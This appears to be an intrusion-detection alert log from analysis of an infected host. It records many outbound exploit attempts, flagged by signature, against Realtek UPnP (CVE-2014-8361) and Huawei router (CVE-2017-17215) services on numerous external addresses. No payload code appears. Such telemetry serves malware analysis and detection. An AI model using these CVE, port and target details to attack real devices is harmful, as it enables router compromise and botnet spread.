                                                2024-07-20T23:05:36.020515+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3484452869192.168.2.1431.136.109.228
                                                2024-07-20T23:05:37.632661+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3765452869192.168.2.1443.124.228.32
                                                2024-07-20T23:05:37.829143+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3791652869192.168.2.14172.51.35.214
                                                2024-07-20T23:05:34.673459+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654237215192.168.2.14197.81.135.223
                                                2024-07-20T23:05:37.613649+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3770252869192.168.2.14203.171.109.95
                                                2024-07-20T23:05:33.859645+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5680237215192.168.2.14197.88.18.67
                                                2024-07-20T23:05:33.870658+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4387837215192.168.2.14197.52.105.112
                                                2024-07-20T23:05:37.664967+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4372052869192.168.2.14154.64.178.0
                                                2024-07-20T23:05:36.332387+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4056437215192.168.2.14169.144.75.68
                                                2024-07-20T23:05:37.613649+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5216252869192.168.2.14131.84.155.33
                                                2024-07-20T23:05:37.716311+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4020652869192.168.2.1438.30.142.71
                                                2024-07-20T23:05:36.549825+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5816037215192.168.2.14149.146.147.141
                                                2024-07-20T23:05:37.566372+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3459452869192.168.2.141.211.28.20
                                                2024-07-20T23:05:36.616913+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5859437215192.168.2.1441.114.157.137
                                                2024-07-20T23:05:37.695376+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3425852869192.168.2.14205.8.145.6
                                                2024-07-20T23:05:33.865440+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5524237215192.168.2.1441.189.66.95
                                                2024-07-20T23:05:34.680576+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3526837215192.168.2.14157.74.195.83
                                                2024-07-20T23:05:34.674515+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3344237215192.168.2.1441.212.223.17
                                                2024-07-20T23:05:36.349447+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4510637215192.168.2.1441.97.238.239
                                                2024-07-20T23:05:33.872982+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4185837215192.168.2.1441.247.46.12
                                                2024-07-20T23:05:36.338393+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4188237215192.168.2.14157.63.205.35
                                                2024-07-20T23:05:35.739880+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4530652869192.168.2.14153.126.184.30
                                                2024-07-20T23:05:38.981126+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5691037215192.168.2.14150.200.98.83
                                                2024-07-20T23:05:34.680576+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3280037215192.168.2.14197.122.120.132
                                                2024-07-20T23:05:37.685966+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4259052869192.168.2.1414.148.186.244
                                                2024-07-20T23:05:34.679255+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4333837215192.168.2.14197.144.99.86
                                                2024-07-20T23:05:33.872000+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4376437215192.168.2.1441.46.124.193
                                                2024-07-20T23:05:36.550338+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5230437215192.168.2.14157.207.127.188
                                                2024-07-20T23:05:52.643011+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4180052869192.168.2.14175.10.5.126
                                                2024-07-20T23:05:33.871918+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5817437215192.168.2.14138.194.165.219
                                                2024-07-20T23:05:39.087253+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077437215192.168.2.14197.21.227.72
                                                2024-07-20T23:05:34.670904+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3700037215192.168.2.1441.88.139.101
                                                2024-07-20T23:05:36.338393+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3443837215192.168.2.14120.73.179.118
                                                2024-07-20T23:05:37.716310+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5850852869192.168.2.14220.224.214.129
                                                2024-07-20T23:05:33.835674+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4573837215192.168.2.14197.48.133.159
                                                2024-07-20T23:05:34.669936+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4751037215192.168.2.1434.202.46.128
                                                2024-07-20T23:05:36.352367+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5886037215192.168.2.14197.86.146.223
                                                2024-07-20T23:05:42.176965+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4963837215192.168.2.14197.142.224.212
                                                2024-07-20T23:05:37.613649+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4614252869192.168.2.1483.71.51.102
                                                2024-07-20T23:05:36.361899+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4666837215192.168.2.14157.134.217.137
                                                2024-07-20T23:05:33.872982+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4873837215192.168.2.14197.38.240.133
                                                2024-07-20T23:05:42.158437+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4632237215192.168.2.14157.196.112.31
                                                2024-07-20T23:05:36.359784+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550037215192.168.2.1441.70.210.4
                                                2024-07-20T23:05:47.256812+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4226837215192.168.2.1441.168.58.131
                                                2024-07-20T23:05:37.693492+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5569452869192.168.2.1412.94.49.225
                                                2024-07-20T23:05:40.427268+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5111052869192.168.2.1467.38.12.24
                                                2024-07-20T23:05:36.550808+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4002037215192.168.2.14107.101.21.133
                                                2024-07-20T23:05:38.971654+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5920037215192.168.2.1441.182.111.237
                                                2024-07-20T23:05:36.334366+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3970437215192.168.2.1441.48.198.170
                                                2024-07-20T23:05:37.695781+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4814452869192.168.2.14134.214.175.73
                                                2024-07-20T23:05:36.354373+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3439237215192.168.2.1472.99.99.186
                                                2024-07-20T23:05:37.645873+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5376652869192.168.2.14168.85.33.243
                                                2024-07-20T23:05:37.656252+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4649052869192.168.2.14134.226.59.80
                                                2024-07-20T23:05:34.678246+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857637215192.168.2.14157.230.63.1
                                                2024-07-20T23:05:37.645873+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5341252869192.168.2.14190.147.108.124
                                                2024-07-20T23:05:33.871918+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5482237215192.168.2.14157.180.0.116
                                                2024-07-20T23:05:34.669936+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6004637215192.168.2.14157.233.107.21
                                                2024-07-20T23:05:37.611583+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3875252869192.168.2.1468.85.217.10
                                                2024-07-20T23:05:45.499211+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5328637215192.168.2.14157.31.72.32
                                                2024-07-20T23:05:42.170114+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4990437215192.168.2.14157.28.72.8
                                                2024-07-20T23:05:36.332387+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4853437215192.168.2.14157.118.173.130
                                                2024-07-20T23:05:34.682964+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3445237215192.168.2.1441.155.35.213
                                                2024-07-20T23:05:33.865110+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4267637215192.168.2.1441.156.206.214
                                                2024-07-20T23:05:33.858846+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4642837215192.168.2.1441.70.140.218
                                                2024-07-20T23:05:37.706701+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3774252869192.168.2.1478.147.130.95
                                                2024-07-20T23:05:33.871999+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5997637215192.168.2.14121.209.116.212
                                                2024-07-20T23:05:40.095319+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5718852869192.168.2.1461.189.27.68
                                                2024-07-20T23:05:37.534770+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5510852869192.168.2.1417.184.234.0
                                                2024-07-20T23:05:47.137205+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4880037215192.168.2.14221.219.36.38
                                                2024-07-20T23:05:36.356816+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5438637215192.168.2.1441.253.179.250
                                                2024-07-20T23:05:34.669936+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481837215192.168.2.14197.145.253.73
                                                2024-07-20T23:05:34.669936+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3699037215192.168.2.14157.40.221.74
                                                2024-07-20T23:05:36.356816+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5913037215192.168.2.1441.97.149.25
                                                2024-07-20T23:05:36.346415+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3639037215192.168.2.14157.157.175.235
                                                2024-07-20T23:05:36.484056+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4958037215192.168.2.1414.63.31.137
                                                2024-07-20T23:05:37.611139+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4111452869192.168.2.14111.8.128.237
                                                2024-07-20T23:05:52.590532+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4503452869192.168.2.14222.41.152.79
                                                2024-07-20T23:05:36.354742+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4854437215192.168.2.1441.142.9.121
                                                2024-07-20T23:05:37.706701+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4945852869192.168.2.14179.21.144.79
                                                2024-07-20T23:05:33.872953+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3776637215192.168.2.14141.199.59.173
                                                2024-07-20T23:05:36.359675+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4297637215192.168.2.1441.240.81.129
                                                2024-07-20T23:05:37.695781+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4478452869192.168.2.1436.164.151.170
                                                2024-07-20T23:05:33.863434+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415837215192.168.2.14197.237.152.228
                                                2024-07-20T23:05:37.469869+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4296852869192.168.2.14199.49.205.148
                                                2024-07-20T23:05:33.871999+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3848037215192.168.2.14197.148.145.109
                                                2024-07-20T23:05:37.686210+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5077052869192.168.2.14101.86.111.6
                                                2024-07-20T23:05:34.684822+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3783037215192.168.2.14157.89.217.112
                                                2024-07-20T23:05:33.860565+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5622837215192.168.2.14157.68.215.138
                                                2024-07-20T23:05:34.676834+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5689637215192.168.2.1447.121.106.191
                                                2024-07-20T23:05:37.534770+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3859052869192.168.2.14178.154.163.217
                                                2024-07-20T23:05:40.469976+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5220652869192.168.2.14100.202.15.240
                                                2024-07-20T23:05:42.170114+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4044037215192.168.2.1463.243.11.1
                                                2024-07-20T23:05:37.773805+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4469052869192.168.2.1465.155.38.231
                                                2024-07-20T23:05:38.956391+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5851637215192.168.2.14197.178.81.75
                                                2024-07-20T23:05:36.359784+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5478037215192.168.2.14131.26.31.236
                                                2024-07-20T23:05:37.547499+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4341452869192.168.2.14103.132.88.33
                                                2024-07-20T23:05:37.611139+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4475452869192.168.2.14196.32.183.241
                                                2024-07-20T23:05:36.342361+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3430237215192.168.2.14197.168.71.172
                                                2024-07-20T23:05:36.549825+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3797837215192.168.2.1441.208.188.114
                                                2024-07-20T23:05:36.342361+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4947237215192.168.2.1444.253.113.189
                                                2024-07-20T23:05:36.359784+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3812037215192.168.2.1470.253.211.133
                                                2024-07-20T23:05:37.645873+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3659252869192.168.2.14162.47.82.104
                                                2024-07-20T23:05:34.679255+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952837215192.168.2.14193.24.185.130
                                                2024-07-20T23:05:37.693492+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3316452869192.168.2.14132.39.168.140
                                                2024-07-20T23:05:33.872982+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4316437215192.168.2.1441.93.186.26
                                                2024-07-20T23:05:52.607039+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3363452869192.168.2.1476.37.36.156
                                                2024-07-20T23:05:37.664967+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5416852869192.168.2.14187.140.68.61
                                                2024-07-20T23:05:37.648285+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5178852869192.168.2.14182.202.245.171
                                                2024-07-20T23:05:33.868951+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3585637215192.168.2.14197.219.134.66
                                                2024-07-20T23:05:36.354742+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492237215192.168.2.14157.3.23.49
                                                2024-07-20T23:05:37.534770+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5569252869192.168.2.14103.77.206.92
                                                2024-07-20T23:05:37.758693+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4279652869192.168.2.14112.153.191.145
                                                2024-07-20T23:05:37.716310+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5072252869192.168.2.1458.236.61.29
                                                2024-07-20T23:05:37.566372+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4720852869192.168.2.1447.85.1.133
                                                2024-07-20T23:05:36.356816+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5373837215192.168.2.1441.254.167.35
                                                2024-07-20T23:05:38.185356+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4221437215192.168.2.1449.254.13.12
                                                2024-07-20T23:05:34.658684+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5744237215192.168.2.14157.16.85.248
                                                2024-07-20T23:05:51.764174+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4689237215192.168.2.1441.216.22.102
                                                2024-07-20T23:05:36.550808+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3348437215192.168.2.14197.80.137.234
                                                2024-07-20T23:05:34.678246+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5102237215192.168.2.1491.134.129.146
                                                2024-07-20T23:05:37.611583+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6081452869192.168.2.14106.140.193.219
                                                2024-07-20T23:05:37.606405+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5548452869192.168.2.1434.90.248.232
                                                2024-07-20T23:05:33.872000+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3364037215192.168.2.14197.223.52.137
                                                2024-07-20T23:05:36.360018+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5228637215192.168.2.14197.245.218.40
                                                2024-07-20T23:05:37.611583+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5278252869192.168.2.14119.83.111.97
                                                2024-07-20T23:05:37.613649+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3863252869192.168.2.14189.150.109.151
                                                2024-07-20T23:05:37.706701+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4041252869192.168.2.14109.170.180.65
                                                2024-07-20T23:05:37.685966+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4993652869192.168.2.1414.90.249.72
                                                2024-07-20T23:05:37.685966+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5675852869192.168.2.1493.120.173.5
                                                2024-07-20T23:05:45.466981+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3619037215192.168.2.14157.1.152.156
                                                2024-07-20T23:05:35.146926+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5913852869192.168.2.14145.229.168.132
                                                2024-07-20T23:05:34.666649+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6045437215192.168.2.141.160.229.40
                                                2024-07-20T23:05:37.664967+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4269052869192.168.2.14205.9.202.98
                                                2024-07-20T23:05:36.814713+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3817437215192.168.2.14157.0.36.222
                                                2024-07-20T23:05:52.582815+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4366452869192.168.2.1466.110.133.249
                                                2024-07-20T23:05:34.658684+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114437215192.168.2.14136.230.51.161
                                                2024-07-20T23:05:37.685966+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3636852869192.168.2.1439.204.207.21
                                                2024-07-20T23:05:34.674515+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4740837215192.168.2.14109.251.14.201
                                                2024-07-20T23:05:37.675714+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4445852869192.168.2.14193.109.205.113
                                                2024-07-20T23:05:36.329793+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3781637215192.168.2.14209.16.9.12
                                                2024-07-20T23:05:36.346416+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5339037215192.168.2.14157.226.247.93
                                                2024-07-20T23:05:37.606405+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5560452869192.168.2.14113.211.98.23
                                                2024-07-20T23:05:37.485425+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6093652869192.168.2.14175.166.165.48
                                                2024-07-20T23:05:36.349447+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5820837215192.168.2.14157.136.100.134
                                                2024-07-20T23:05:33.839450+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4349437215192.168.2.1441.146.165.184
                                                2024-07-20T23:05:36.334366+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4005037215192.168.2.1488.161.48.213
                                                2024-07-20T23:05:37.485425+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5929852869192.168.2.1444.6.194.12
                                                2024-07-20T23:05:42.145992+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4927637215192.168.2.1441.169.68.169
                                                2024-07-20T23:05:40.485968+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3542252869192.168.2.1495.244.78.147
                                                2024-07-20T23:05:37.686210+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4476452869192.168.2.14223.210.25.241
                                                2024-07-20T23:05:36.349447+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4041637215192.168.2.1441.67.253.194
                                                2024-07-20T23:05:33.868951+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608437215192.168.2.14197.50.11.183
                                                2024-07-20T23:05:48.865590+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4957237215192.168.2.14157.13.175.113
                                                2024-07-20T23:05:45.460570+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5647837215192.168.2.14197.166.98.215
                                                2024-07-20T23:05:34.673041+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6083837215192.168.2.14197.127.169.149
                                                2024-07-20T23:05:37.686210+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4834652869192.168.2.14114.248.35.135
                                                2024-07-20T23:05:36.363294+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4981637215192.168.2.1441.177.215.233
                                                2024-07-20T23:05:33.872953+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5249437215192.168.2.14216.204.37.61
                                                2024-07-20T23:05:37.591367+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5165452869192.168.2.14173.89.193.209
                                                2024-07-20T23:05:34.666649+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4423237215192.168.2.1441.219.3.184
                                                2024-07-20T23:05:37.648285+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5234052869192.168.2.14143.165.147.195
                                                2024-07-20T23:05:36.340522+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3634237215192.168.2.14213.181.91.168
                                                2024-07-20T23:05:33.872982+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5995037215192.168.2.14157.33.158.151
                                                2024-07-20T23:05:51.745940+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4407037215192.168.2.14189.255.135.112
                                                2024-07-20T23:05:36.354743+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176637215192.168.2.14157.199.126.73
                                                2024-07-20T23:05:37.675714+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3699252869192.168.2.14184.126.92.19
                                                2024-07-20T23:05:52.614051+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4790452869192.168.2.1441.126.157.26
